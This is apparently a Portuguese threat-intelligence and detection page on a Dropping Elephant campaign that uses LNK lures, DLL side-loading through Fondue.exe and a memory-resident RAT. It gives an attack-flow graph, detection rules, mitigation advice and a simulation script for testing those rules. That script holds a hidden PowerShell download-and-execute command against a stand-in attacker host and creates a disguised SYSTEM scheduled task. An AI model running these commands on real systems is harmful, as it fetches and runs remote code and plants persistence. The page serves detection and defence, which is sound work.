Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma campanha sofisticada atribuída ao Dropping Elephant utiliza documentos de isca temáticos da China para entregar um trojan de acesso remoto atualizado e residente em memória. A invasão depende do carregamento de DLL através de um binário legítimo da Microsoft e do carregador de shellcode Donut para evitar a detecção baseada em disco. A carga final também utiliza métodos avançados de evasão, incluindo achatamento de fluxo de controle e reconstrução de API em tempo de execução.
Investigação
Pesquisadores da Rapid7 descobriram a ameaça durante uma caça proativa que começou com um atalho malicioso do Windows disfarçado de documento PDF. Sua investigação seguiu a cadeia de carga útil desde o estágio inicial em chinagreenenergy[.]org através do carregamento de DLL de APPWIZ.cpl até a execução de um RAT em memória. A análise em nível de código com Diaphora confirmou uma linhagem comum com amostras anteriores do Dropping Elephant, apesar de extensa reformulação.
Mitigação
Os defensores devem priorizar detecções comportamentais, como arquivos de atalho lançando PowerShell e estágio de carga útil suspeito em C:UsersPublic. Monitorar tarefas agendadas com nomes incomuns e identificar o carregamento de DLL de diretórios inesperados também é importante. Além disso, defesas em endpoints precisam de visibilidade em nível de memória para detectar alterações no AMSI, WLDP e ETW.
Resposta
Se essa atividade for detectada, isole imediatamente os sistemas afetados para interromper o tráfego de comando e controle. Realize forense na memória para identificar o RAT injetado e inspecione as tarefas agendadas para persistência. Logs de rede também devem ser revisados para tráfego HTTPS não autorizado para os domínios de C2 conhecidos e para quaisquer sinais de exfiltração de arquivos.
graph TB %% Definições de classes classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef network fill:#ffff99 %% Definições dos nós %% Acesso inicial e execução action_user_exec[“<b>Ação</b> – <b>T1204.002 Execução pelo Utilizador: Ficheiro Malicioso</b><br/>A vítima executa um ficheiro de atalho malicioso<br/><b>Ficheiro</b>: GRES3001.lnk<br/><b>Disfarce</b>: Ícone PDF”] class action_user_exec action action_icon_smuggling[“<b>Ação</b> – <b>T1027.012 Ficheiros ou Informação Ofuscados: Ocultação por Ícone LNK</b><br/>Engana o utilizador através da manipulação de ícones<br/><b>Método</b>: Falsificação do ícone de ficheiro LNK”] class action_icon_smuggling action %% Fase do descarregador process_conhost[“<b>Processo</b> – <b>conhost.exe</b><br/>Processo anfitrião para janelas de consola<br/><b>Função</b>: Inicia o descarregador PowerShell”] class process_conhost process action_binary_padding[“<b>Ação</b> – <b>T1027.001 Ficheiros ou Informação Ofuscados: Preenchimento Binário</b><br/>Utiliza ofuscação por divisão de cadeias de texto<br/><b>Alvo</b>: Script descarregador PowerShell”] class action_binary_padding action tool_downloader[“<b>Ferramenta</b> – <b>Descarregador PowerShell</b><br/>Obtém ficheiros de isco e cargas maliciosas<br/><b>Origem</b>: chinagreenenergy[.]org”] class tool_downloader tool %% Pós-descarregamento e persistência action_masquerading[“<b>Ação</b> – <b>T1036.008 Mascaramento: Mascarar Tipo de Ficheiro</b><br/>Renomeia ficheiros para parecerem legítimos<br/><b>Diretório</b>: C:\\Users\\Public\\”] class action_masquerading action action_persistence[“<b>Ação</b> – <b>T1546 Execução Acionada por Evento</b><br/>Garante persistência através de uma tarefa agendada<br/><b>Nome da Tarefa</b>: GoogleErrorReport<br/><b>Intervalo</b>: A cada minuto”] class action_persistence action %% Cadeia de execução e side-loading action_proxy_exec[“<b>Ação</b> – <b>T1218.002 Execução Proxy de Binário do Sistema: Painel de Controlo</b><br/>Utiliza um binário legítimo para executar o carregador<br/><b>Binário</b>: Fondue.exe”] class action_proxy_exec action tool_loader_cpl[“<b>Ferramenta</b> – <b>APPWIZ.cpl</b><br/>Carregador malicioso do Painel de Controlo<br/><b>Método</b>: DLL Side-loading”] class tool_loader_cpl tool action_reflective_load[“<b>Ação</b> – <b>T1620 Carregamento Refletivo de Código</b><br/>Mapeia código diretamente na memória<br/><b>Carregador</b>: Carregador de shellcode Donut”] class action_reflective_load action %% Pós-exploração e C2 malware_rat[“<b>Malware</b> – <b>RAT</b><br/>Trojan de Acesso Remoto<br/><b>Estado</b>: Residente na memória”] class malware_rat malware action_gather_info[“<b>Ação</b> – <b>T1592 Recolher Informação do Sistema da Vítima</b><br/>Recolhe metadados do sistema<br/><b>Dados</b>: Nome de utilizador, nome do computador, SO, IP”] class action_gather_info action action_c2[“<b>Ação</b> – <b>TA0011 Comando e Controlo</b><br/>Mantém comunicação através de HTTPS<br/><b>Domínio</b>: gcl-power[.]org”] class action_c2 action action_exfiltration[“<b>Ação</b> – <b>Captura de Ecrã e Exfiltração</b><br/>T1113 Captura de Ecrã<br/><b>Objetivo</b>: Roubo de dados”] class action_exfiltration action %% Fluxo de ligações action_user_exec –>|leva_a| action_icon_smuggling action_icon_smuggling –>|aciona| process_conhost process_conhost –>|utiliza| action_binary_padding action_binary_padding –>|executa| tool_downloader tool_downloader –>|descarrega_para| action_masquerading action_masquerading –>|configura| action_persistence action_persistence –>|aciona| action_proxy_exec action_proxy_exec –>|carrega| tool_loader_cpl tool_loader_cpl –>|utiliza| action_reflective_load action_reflective_load –>|instala| malware_rat malware_rat –>|executa| action_gather_info malware_rat –>|estabelece| action_c2 action_c2 –>|facilita| action_exfiltration
Fluxo de Ataque
Detecções
Possíveis Tentativas de Comunicação de Domínios de Pesquisa de IP (via dns)
Ver
Execução de Mudança de Página de Código Incomum (via linha de comando)
Ver
Tarefa Agendada Suspeita (via auditoria)
Ver
Execução Suspeita do Perfil de Usuário Público (via criação de processo)
Ver
Biblioteca Dinâmica Vcruntime140 Carregada de Diretório Suspeito (via carregamento de imagem)
Ver
Arquivos Suspeitos no Perfil de Usuário Público (via evento de arquivo)
Ver
Detecção da Campanha de Malware Dropping Elephant [Conexão de Rede Windows]
Ver
Carregamento Suspeito de DLL Maliciosa via Fondue.exe [Evento de Arquivo do Windows]
Ver
Detecção da Campanha de Malware Dropping Elephant via Atalho e Side-Loading [Criação de Processo do Windows]
Ver
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria e Linha de Base deve ter sido aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para disparar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa & Comandos de Ataque: O adversário visa estabelecer persistência e executar um downloader. Para evitar filtragens padrão de e-mails, eles usam um arquivo de atalho chamado
GRES3001.lnkque aparece como um PDF. Quando clicado, ele chamaconhost.exepara executar um script PowerShell. Simultaneamente, eles estabelecem persistência criando uma tarefa agendada chamadaGoogleErrorReportprojetada para executarFondue.exede um diretório público, disfarçado como um legítimo relator de erro do Google para evitar inspeção casual. -
Script de Teste de Regressão:
# 1. Simular o comportamento de Atalho/Conhost # Simulamos a execução de conhost.exe com a string específica na linha de comando Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" # Nota: Para corresponder estritamente à 'CommandLine contains GRES3001.lnk', simulamos a chamada de processo como se tivesse vindo desse arquivo. # Como não podemos facilmente falsificar o nome do processo pai em um script simples, simulamos a string de linha de comando esperada. Write-Host "[!] Simulando disparo do GRES3001.lnk..." $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Loaded'" # Em um ambiente real, o campo 'CommandLine' no Sysmon conteria a string alvo. # 2. Simular a Tarefa Agendada e o side-loading do Fondue.exe Write-Host "[!] Simulando tarefa agendada GoogleErrorReport..." New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload" $TaskName = "GoogleErrorReport" $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe" Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Tarefa Simulada Dropping Elephant" -User "SYSTEM" -Force Write-Host "[+] Simulação Completa. Verifique SIEM para alertas." -
Comandos de Limpeza:
# Remover o binário malware dummy Remove-Item -Path "C:UsersPublicFondue.exe" -Force # Remover a tarefa agendada maliciosa Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false Write-Host "[+] Limpeza Completa."